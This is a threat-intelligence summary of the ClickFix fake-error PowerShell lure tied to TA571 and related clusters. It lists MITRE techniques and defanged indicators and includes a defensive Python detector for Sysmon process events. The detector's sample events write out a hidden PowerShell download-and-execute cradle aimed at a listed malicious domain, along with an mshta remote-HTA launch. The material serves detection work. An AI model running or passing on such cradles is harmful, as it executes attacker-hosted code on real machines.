ClickFix is a social engineering tactic that emerged in 2024: a fake error popup tells the victim to run a "fix" that is in fact malicious PowerShell, giving the attacker code execution on Windows or macOS without exploiting any software flaw. The campaigns tie to TA571 and to the Slavic Nation Empire (SNE) and Scamquerteo clusters, target cryptocurrency/Web3 users, and rely on the victim's own actions to sidestep antivirus and browser protections.
#ClickFix #TA571 #SNE #Scamquerteo #GoogleMeet #Matanbuchus #AMOSStealer #Stealc
Keypoints
- ClickFix emerged in 2024 as a new social engineering tactic using fake error messages to prompt PowerShell-based execution.
- It leverages phishing lures (HTML files masquerading as Word docs) to deliver malware.
- TA571 has employed ClickFix in email campaigns since March 2024 to distribute payloads.
- Malware families distributed include Matanbuchus, DarkGate, NetSupport RAT, and infostealers for Windows and macOS.
- Campaigns impersonate legitimate services (e.g., Google Meet) to deceive victims and evade defenses.
- Threat actors and clusters linked to this tactic include Slavic Nation Empire (SNE) and Scamquerteo, connected to Marko Polo and CryptoLove networks.
- The ClickFix cluster uses centralized infrastructure and Telegram bots to monitor compromises and coordinate operations.
- Campaigns show a focus on cryptocurrency/Web3 users, but the technique could generalize to other sectors.
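The execution step described in the keypoints above, seen from the defender's side, as an added example that is not code from this page or from Sekoia: it scores process-creation events (Sysmon Event ID 1 field names) for a ClickFix-style launch, i.e. a PowerShell/mshta child of explorer.exe (the Run dialog) or of a browser, carrying the traits of a pasted one-liner, and it adds weight when the command line references a domain from this page's IOC list. The parent/child sets, regexes, weights and the sample events are assumptions constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Domains copied from this page's IOC list. Everything else in this example
# (parent/child lists, regexes, weights, sample events) is an assumption.
IOC_DOMAINS = {
    "meet.google.us-join.com",
    "meet.google.com-join.us",
    "googiedrivers.com",
    "carolinejuskus.com",
}

# ClickFix executions start from the user's own session: the Run dialog
# (parent explorer.exe) or the browser that rendered the lure page.
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits typical of a pasted one-liner. Each hit scores 1.
TRAITS = [
    (re.compile(r"(?i)-(e|ec|enc|encodedcommand)\b"), "encoded command"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)\b(iex|invoke-expression)\b"), "invoke-expression"),
    (re.compile(r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b"),
     "download cradle"),
    (re.compile(r"(?i)-nop\b|-noprofile\b"), "noprofile"),
]
ALERT_THRESHOLD = 2  # assumed cut-off; tune against your own baseline


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_domains(cmdline: str) -> set:
    """Hostnames of any http(s) URLs embedded in the command line."""
    return {m.lower() for m in re.findall(r"https?://([A-Za-z0-9.-]+)", cmdline)}


def analyze_event(ev: Dict[str, str]) -> Optional[Dict]:
    """Score one process-creation event; return a finding or None."""
    parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if parent not in USER_PARENTS or child not in INTERPRETERS:
        return None
    score, reasons = 0, []
    hits = extract_domains(cmd) & IOC_DOMAINS
    if hits:  # a known lure/payload domain outweighs any single trait
        score += 3
        reasons.append("known ClickFix domain: " + ", ".join(sorted(hits)))
    for rx, label in TRAITS:
        if rx.search(cmd):
            score += 1
            reasons.append(label)
    if child == "mshta.exe" and re.search(r"https?://", cmd):
        score += 2  # mshta pulling a remote HTA is rarely legitimate
        reasons.append("mshta with remote URL")
    if score < ALERT_THRESHOLD:
        return None
    return {"score": score, "parent": parent, "child": child, "reasons": reasons, "cmdline": cmd}


def scan(events: List[Dict[str, str]]) -> List[Dict]:
    """Findings for every event that crosses the threshold, in input order."""
    return [f for f in map(analyze_event, events) if f]


# Constructed sample events using Sysmon Event ID 1 field names (not real telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix paste: Run dialog -> PowerShell fetching the page's fix-error URL
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -nop -c "iex (irm https://googiedrivers.com/fix-error)"',
    },
    {   # Benign: the user runs a local script from the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Scripts\backup.ps1",
    },
    {   # Browser launching mshta against a remote HTA (no known IOC, behaviour alone)
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/fix.hta",
    },
    {   # Encoded, profile-less PowerShell from the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -EncodedCommand aQBlAHgA",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[score {f['score']}] {f['parent']} -> {f['child']}: {'; '.join(f['reasons'])}")
```

The second sample shows why parent/child alone is not enough: explorer.exe spawning PowerShell is routine, so the rule only fires when the command line also looks like a pasted cradle or names a known lure domain. When process telemetry is missing, the pasted command usually also survives in the user's HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key, which is a useful forensic pivot.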
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell – Malicious PowerShell run by the victim after following the instructions in a fake error message.
- [T1566.001] Phishing: Spearphishing Attachment – Phishing emails carrying HTML attachments disguised as Word documents.
- [T1071.001] Application Layer Protocol: Web Protocols – HTTP(S) traffic to C2 servers for payload delivery and data exfiltration.
- [T1003] OS Credential Dumping – Infostealers harvesting credentials and other sensitive data from victims (browser-stored credentials specifically fall under T1555.003, Credentials from Web Browsers).
- [T1210] Exploitation of Remote Services – Listed by the source for delivery through vulnerable remote services; note that the ClickFix lure itself needs no exploit and is better described by T1204, User Execution.
Indicators of Compromise
- [Domain] – meet[.]google[.]us-join[.]com, googiedrivers[.]com (phishing domains impersonating Google Meet)
- [IP Address] – 77[.]221[.]157[.]170, 95[.]182[.]97[.]58
- [URL] – hxxps://meet[.]google[.]com-join[.]us/wmq-qcdn-orj, hxxps://meet[.]google[.]us-join[.]com/ywk-batf-sfh
- [SHA256] – 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138, 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5 (and 2 more hashes)
- [File Name] – fix-error, Launcher_v1.94.dmg
- [URL] – hxxps://googiedrivers[.]com/fix-error, hxxps://carolinejuskus[.]com/kusaka.php?call=launcher
Read more: https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/